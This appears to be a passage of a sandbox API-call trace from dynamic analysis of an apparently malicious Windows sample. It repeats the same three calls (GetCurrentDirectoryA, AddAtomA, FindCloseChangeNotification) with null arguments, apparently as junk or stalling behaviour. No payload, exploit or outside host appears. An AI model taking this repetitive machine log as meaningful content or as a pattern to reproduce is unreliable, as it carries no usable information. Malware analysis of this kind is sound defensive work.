[0083.524] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.524] AddAtomA (lpString=0x0) returned 0x0 [0083.524] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.525] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.525] AddAtomA (lpString=0x0) returned 0x0 [0083.525] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.525] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.525] AddAtomA (lpString=0x0) returned 0x0 [0083.525] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.525] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.525] AddAtomA (lpString=0x0) returned 0x0 [0083.525] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.525] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.525] AddAtomA (lpString=0x0) returned 0x0 [0083.525] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.525] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.525] AddAtomA (lpString=0x0) returned 0x0 [0083.525] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.525] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.525] AddAtomA (lpString=0x0) returned 0x0 [0083.525] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.525] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.525] AddAtomA (lpString=0x0) returned 0x0 [0083.525] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.525] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.525] AddAtomA (lpString=0x0) returned 0x0 [0083.525] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.526] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.526] AddAtomA (lpString=0x0) returned 0x0 [0083.526] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.526] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.526] AddAtomA (lpString=0x0) returned 0x0 [0083.526] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.526] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.526] AddAtomA (lpString=0x0) returned 0x0 [0083.526] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.526] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.526] AddAtomA (lpString=0x0) returned 0x0 [0083.526] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.526] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.526] AddAtomA (lpString=0x0) returned 0x0 [0083.526] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.526] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.526] AddAtomA (lpString=0x0) returned 0x0 [0083.526] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.526] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.526] AddAtomA (lpString=0x0) returned 0x0 [0083.526] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.526] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.526] AddAtomA (lpString=0x0) returned 0x0 [0083.527] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.527] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.527] AddAtomA (lpString=0x0) returned 0x0 [0083.527] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.527] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.527] AddAtomA (lpString=0x0) returned 0x0 [0083.527] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.527] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.527] AddAtomA (lpString=0x0) returned 0x0 [0083.527] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.527] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.527] AddAtomA (lpString=0x0) returned 0x0 [0083.527] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.527] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.527] AddAtomA (lpString=0x0) returned 0x0 [0083.527] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.527] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.527] AddAtomA (lpString=0x0) returned 0x0 [0083.527] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.527] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.527] AddAtomA (lpString=0x0) returned 0x0 [0083.527] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.527] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.527] AddAtomA (lpString=0x0) returned 0x0 [0083.527] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.528] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.528] AddAtomA (lpString=0x0) returned 0x0 [0083.528] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.528] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.528] AddAtomA (lpString=0x0) returned 0x0 [0083.528] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.528] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.528] AddAtomA (lpString=0x0) returned 0x0 [0083.528] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.528] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.528] AddAtomA (lpString=0x0) returned 0x0 [0083.528] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.528] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.528] AddAtomA (lpString=0x0) returned 0x0 [0083.528] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.528] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.528] AddAtomA (lpString=0x0) returned 0x0 [0083.528] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.528] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.529] AddAtomA (lpString=0x0) returned 0x0 [0083.529] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.529] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.529] AddAtomA (lpString=0x0) returned 0x0 [0083.529] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.529] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.529] AddAtomA (lpString=0x0) returned 0x0 [0083.529] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.529] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.529] AddAtomA (lpString=0x0) returned 0x0 [0083.529] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.529] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.529] AddAtomA (lpString=0x0) returned 0x0 [0083.529] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.529] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.529] AddAtomA (lpString=0x0) returned 0x0 [0083.529] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.530] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.530] AddAtomA (lpString=0x0) returned 0x0 [0083.530] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.530] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.530] AddAtomA (lpString=0x0) returned 0x0 [0083.530] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.530] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.530] AddAtomA (lpString=0x0) returned 0x0 [0083.530] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.530] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.530] AddAtomA (lpString=0x0) returned 0x0 [0083.530] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.530] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.530] AddAtomA (lpString=0x0) returned 0x0 [0083.530] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.530] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.531] AddAtomA (lpString=0x0) returned 0x0 [0083.531] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.531] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.531] AddAtomA (lpString=0x0) returned 0x0 [0083.531] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.531] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.531] AddAtomA (lpString=0x0) returned 0x0 [0083.531] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.531] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.531] AddAtomA (lpString=0x0) returned 0x0 [0083.531] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.531] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.531] AddAtomA (lpString=0x0) returned 0x0 [0083.531] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.531] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.531] AddAtomA (lpString=0x0) returned 0x0 [0083.531] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.531] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.531] AddAtomA (lpString=0x0) returned 0x0 [0083.531] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.531] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.531] AddAtomA (lpString=0x0) returned 0x0 [0083.532] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.532] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.532] AddAtomA (lpString=0x0) returned 0x0 [0083.532] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.532] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.532] AddAtomA (lpString=0x0) returned 0x0 [0083.532] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.532] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.532] AddAtomA (lpString=0x0) returned 0x0 [0083.532] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.532] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.532] AddAtomA (lpString=0x0) returned 0x0 [0083.532] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.532] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.532] AddAtomA (lpString=0x0) returned 0x0 [0083.532] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.532] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.532] AddAtomA (lpString=0x0) returned 0x0 [0083.532] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.532] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.532] AddAtomA (lpString=0x0) returned 0x0 [0083.533] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.533] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.533] AddAtomA (lpString=0x0) returned 0x0 [0083.533] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.533] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.533] AddAtomA (lpString=0x0) returned 0x0 [0083.533] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.533] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.533] AddAtomA (lpString=0x0) returned 0x0 [0083.533] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.533] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.533] AddAtomA (lpString=0x0) returned 0x0 [0083.533] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.533] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.533] AddAtomA (lpString=0x0) returned 0x0 [0083.533] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.533] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.533] AddAtomA (lpString=0x0) returned 0x0 [0083.533] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.533] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.533] AddAtomA (lpString=0x0) returned 0x0 [0083.534] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.534] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.534] AddAtomA (lpString=0x0) returned 0x0 [0083.534] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.534] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.534] AddAtomA (lpString=0x0) returned 0x0 [0083.534] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.534] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.534] AddAtomA (lpString=0x0) returned 0x0 [0083.534] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.534] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.534] AddAtomA (lpString=0x0) returned 0x0 [0083.534] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.534] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.534] AddAtomA (lpString=0x0) returned 0x0 [0083.534] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.534] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.534] AddAtomA (lpString=0x0) returned 0x0 [0083.534] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.534] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.534] AddAtomA (lpString=0x0) returned 0x0 [0083.534] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.534] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.534] AddAtomA (lpString=0x0) returned 0x0 [0083.534] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.534] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.534] AddAtomA (lpString=0x0) returned 0x0 [0083.535] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.535] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.535] AddAtomA (lpString=0x0) returned 0x0 [0083.535] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.535] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.535] AddAtomA (lpString=0x0) returned 0x0 [0083.535] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.535] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.535] AddAtomA (lpString=0x0) returned 0x0 [0083.535] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.535] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.535] AddAtomA (lpString=0x0) returned 0x0 [0083.535] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.535] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.535] AddAtomA (lpString=0x0) returned 0x0 [0083.535] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.535] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.535] AddAtomA (lpString=0x0) returned 0x0 [0083.535] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.535] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.535] AddAtomA (lpString=0x0) returned 0x0 [0083.535] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.535] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.535] AddAtomA (lpString=0x0) returned 0x0 [0083.535] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.535] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.535] AddAtomA (lpString=0x0) returned 0x0 [0083.536] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.536] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.536] AddAtomA (lpString=0x0) returned 0x0 [0083.536] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.536] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.536] AddAtomA (lpString=0x0) returned 0x0 [0083.536] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.536] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.536] AddAtomA (lpString=0x0) returned 0x0 [0083.536] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.536] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.536] AddAtomA (lpString=0x0) returned 0x0 [0083.536] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.536] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.536] AddAtomA (lpString=0x0) returned 0x0 [0083.536] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.536] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.536] AddAtomA (lpString=0x0) returned 0x0 [0083.536] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.536] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.536] AddAtomA (lpString=0x0) returned 0x0 [0083.536] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.536] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.536] AddAtomA (lpString=0x0) returned 0x0 [0083.536] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.537] AddAtomA (lpString=0x0) returned 0x0 [0083.537] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.537] AddAtomA (lpString=0x0) returned 0x0 [0083.537] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.537] AddAtomA (lpString=0x0) returned 0x0 [0083.537] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.537] AddAtomA (lpString=0x0) returned 0x0 [0083.537] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.537] AddAtomA (lpString=0x0) returned 0x0 [0083.537] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.537] AddAtomA (lpString=0x0) returned 0x0 [0083.537] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.537] AddAtomA (lpString=0x0) returned 0x0 [0083.537] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.537] AddAtomA (lpString=0x0) returned 0x0 [0083.537] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.537] AddAtomA (lpString=0x0) returned 0x0 [0083.537] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.537] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.538] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.538] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.538] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.538] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.538] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.538] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.538] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.538] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.538] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.538] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.538] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.538] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.538] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.538] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.538] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.538] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.538] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.538] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.538] AddAtomA (lpString=0x0) returned 0x0 [0083.539] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.539] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.539] AddAtomA (lpString=0x0) returned 0x0 [0083.539] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.539] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.539] AddAtomA (lpString=0x0) returned 0x0 [0083.539] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.539] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.539] AddAtomA (lpString=0x0) returned 0x0 [0083.539] FindCloseChangeNotification 